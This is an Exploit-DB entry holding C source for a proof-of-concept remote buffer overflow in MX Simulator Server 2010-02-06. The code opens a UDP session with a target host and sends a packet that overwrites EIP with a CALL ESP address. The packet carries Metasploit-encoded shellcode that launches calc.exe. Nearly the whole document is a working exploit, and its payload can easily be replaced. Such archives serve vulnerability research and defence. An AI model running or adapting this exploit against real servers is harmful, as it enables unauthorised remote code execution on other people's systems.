MX Simulator Server - Remote Buffer Overflow

EDB-ID:

11857

CVE:



Platform:

Windows

Published:

2010-03-23

/*

    MX Simulator Server 2010-02-06 Remote Buffer Overflow PoC
	
	This PoC  will executes  the  calc.exe software on the remote
	system.
	The bug was discovered by Luigi Auriemma (www.aluigi.org)

    Copyright 2010 Salvatore Fresta aka Drosophila
    http://www.salvatorefresta.net/?opt=adv
    http://www.salvatorefresta.net/files/poc/PoC-MXSimulatorServer2010-02-06.zip

    This program is free software; you can redistribute it and/or
    modify it under the terms of  the  GNU General Public License
    as published by the  Free Software Foundation; either version 
    2 of the License, or (at your option) any later version.

    This program  is  distributed  in the hope  that  it  will be
    useful, but WITHOUT ANY WARRANTY;  without  even the  implied
    warranty  of  MERCHANTABILITY  or  FITNESS  FOR  A PARTICULAR
    PURPOSE. See the GNU General Public License for more details.

    You should have  received a copy  of  the  GNU General Public
    License along  with  this program;  if not, write to the Free
    Software Foundation,Inc., 59 Temple Place, Suite 330, Boston,
    MA 02111-1307 USA

    http://www.gnu.org/licenses/gpl-2.0.txt

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>
#endif

#define BUFFSZ      1024
#define PORT        19800

/*
* windows/exec - 511 bytes
* http://www.metasploit.com
* Encoder: x86/alpha_mixed
* EXITFUNC=process, CMD=calc.exe
*/
#define shellcode \
				"\xb8\x9e\xef\xf3\x90\x31\xc9\xb1\x33\xd9\xc2\xd9\x74\x24\xf4" \
				"\x5b\x31\x43\x0e\x83\xc3\x04\x03\xdd\xe5\x11\x65\x1d\x11\x5c" \
				"\x86\xdd\xe2\x3f\x0e\x38\xd3\x6d\x74\x49\x46\xa2\xfe\x1f\x6b" \
				"\x49\x52\x8b\xf8\x3f\x7b\xbc\x49\xf5\x5d\xf3\x4a\x3b\x62\x5f" \
				"\x88\x5d\x1e\x9d\xdd\xbd\x1f\x6e\x10\xbf\x58\x92\xdb\xed\x31" \
				"\xd9\x4e\x02\x35\x9f\x52\x23\x99\x94\xeb\x5b\x9c\x6a\x9f\xd1" \
				"\x9f\xba\x30\x6d\xd7\x22\x3a\x29\xc8\x53\xef\x29\x34\x1a\x84" \
				"\x9a\xce\x9d\x4c\xd3\x2f\xac\xb0\xb8\x11\x01\x3d\xc0\x56\xa5" \
				"\xde\xb7\xac\xd6\x63\xc0\x76\xa5\xbf\x45\x6b\x0d\x4b\xfd\x4f" \
				"\xac\x98\x98\x04\xa2\x55\xee\x43\xa6\x68\x23\xf8\xd2\xe1\xc2" \
				"\x2f\x53\xb1\xe0\xeb\x38\x61\x88\xaa\xe4\xc4\xb5\xad\x40\xb8" \
				"\x13\xa5\x62\xad\x22\xe4\xe8\x30\xa6\x92\x55\x32\xb8\x9c\xf5" \
				"\x5b\x89\x17\x9a\x1c\x16\xf2\xdf\xd3\x5c\x5f\x49\x7c\x39\x35" \
				"\xc8\xe1\xba\xe3\x0e\x1c\x39\x06\xee\xdb\x21\x63\xeb\xa0\xe5" \
				"\x9f\x81\xb9\x83\x9f\x36\xb9\x81\xc3\xd9\x29\x49\x2a\x7c\xca" \
				"\xe8\x32"

int send_recv(int sd, unsigned char *in, int insz, unsigned char *out, int outsz, struct sockaddr_in *peer, int err);
int timeout(int sock, int secs);
unsigned int resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {

    struct  sockaddr_in peer;
    int     sd,
            len;
    unsigned short     port = PORT;
    unsigned char      buff[BUFFSZ],
					   *host = NULL,
					   pkg[] =
								"\x03"
								"\x00\x00\x00\x00"			// slot
								"\x00\x00\x00\x00"			// session id
								"\x00\x00\x00\x00"			// admin pwd crc
								"\x00\x00\x00\x00"			// uid
								"000000000000000000000000"	// ???
								"yz250f||||\n"				// bike's model
								"999\n"						// bike's number
								"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
								"\xd8\x69\x83\x7c"          // EIP - CALL ESP (FFD4)
								shellcode;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    if(argc < 2) {
        printf("\nMX Simulator Server 2010-02-06 Remote Buffer Overflow PoC - Salvatore Fresta\n"
		       "http://www.salvatorefresta.net\n"
		       "\n"
               "Usage: %s <target host> <port> (default: %hu)\n"
                "\n", argv[0], port);
        return -1;
    }

    host = argv[1];
    if(argc > 2) port = atoi(argv[2]);

    peer.sin_addr.s_addr  = resolv(host);
    peer.sin_port         = htons(port);
    peer.sin_family       = AF_INET;
	
	printf("\n[*] Socket opening in progress...");

	sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) {
	    printf("\n[-] Unable to open a socket!\n\n");
		std_err();
	}
	
	printf("\n[+] Socket open successfully"
	       "\n[*] Data sending in progress...");

    memset(buff, 0, 9);
	len = send_recv(sd, buff, 9, buff, BUFFSZ, &peer, 1);
		
	*(int *)(pkg + 1) = *(int *)(buff + 1);
	*(int *)(pkg + 5) = *(int *)(buff + 5);	
	len = send_recv(sd, pkg, sizeof(pkg) - 1, buff, BUFFSZ, &peer, 0);

	printf("\n[+] Data sent successfully"
	       "\n[+] Connection closed\n\n");
	
    close(sd);

    return 0;
	
}



int send_recv(int sd, unsigned char *in, int insz, unsigned char *out, int outsz, struct sockaddr_in *peer, int err) {

    int retry,
        len;

    if(in && !out) {
        fputc('.', stdout);
        if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
          < 0) std_err();
        return(0);
    }
	
    if(in) {
        for(retry = 2; retry; retry--) {
            fputc('.', stdout);
            if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
              < 0) std_err();
            if(!timeout(sd, 1)) break;
        }

        if(!retry) {
            if(!err) return(-1);
            printf("\nError: socket timeout, no reply received\n\n");
            exit(1);
        }
    } else {
        if(timeout(sd, 3) < 0) return(-1);
    }

    fputc('.', stdout);
    len = recvfrom(sd, out, outsz, 0, NULL, NULL);
    if(len < 0 && err) std_err();
    
	return len;
	
}



int timeout(int sock, int secs) {

    struct timeval tout;
    fd_set fd_read;
    int err;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    
	return 0;
	
}



unsigned int resolv(char *host) {

    struct hostent *hp = NULL;
    unsigned int host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(unsigned int *)hp->h_addr;
    }
	
    return host_ip;

}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif